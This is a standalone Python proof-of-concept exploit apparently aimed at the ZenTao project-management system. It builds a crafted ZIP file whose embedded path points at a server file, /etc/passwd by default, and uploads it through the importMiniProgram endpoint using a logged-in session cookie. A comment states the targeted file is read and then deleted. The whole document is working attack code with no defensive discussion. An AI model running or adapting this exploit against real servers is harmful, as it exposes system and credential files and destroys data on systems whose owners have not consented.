import requests


def urlChecker(url):
    if url[-1] == '/': url = url[:-1]
    return url


def payload_gen(file):
    head = "504B01020d0a"
    tail = "504B0506313233343536010039303132000000000000"
    front = "a" * 22
    after = "a" * 16

    def toHex(st):
        bytes_data = bytes.fromhex(st)
        ascii_str = bytes_data.decode('ascii', errors='replace')
        return ascii_str

    pay_len = hex(len(file))[2:]
    if len(pay_len) <= 4:
        pay_len = "0" * (4 - len(pay_len)) + pay_len
    else:
        exit("Invalid length")
    length = pay_len[2:] + pay_len[:2]

    payload = toHex(head) + front + toHex(length) + after + file + toHex(tail)
    return payload


def upload(url, payload, cookie, path):
    headers = {
        "Cookie": cookie,
        "Referer": url + "/index.php?m=my&f=index"
    }

    data = {"published": "work", "category": 1}
    files = {"file": ("test.zip", payload, "application/octet-stream")}
    url += path
    response = requests.post(url, headers=headers, data=data, files=files)
    print(response.text.split("<html>")[0])


def run(url, file, cookie, path):
    url = urlChecker(url)
    payload = payload_gen(file)
    upload(url, payload, cookie, path)


if __name__ == "__main__":
    url = "http://127.0.0.1/"
    path = "/index.php?m=ai&f=importMiniProgram"
    cookie = "zentaosid=bj4tmasdbbdvud564ubqf1q8md"  # Login Required,Just need the zentaosid parameter
    file = r"/etc/passwd"  # After reading the file, it will be deleted
    run(url, file, cookie, path)
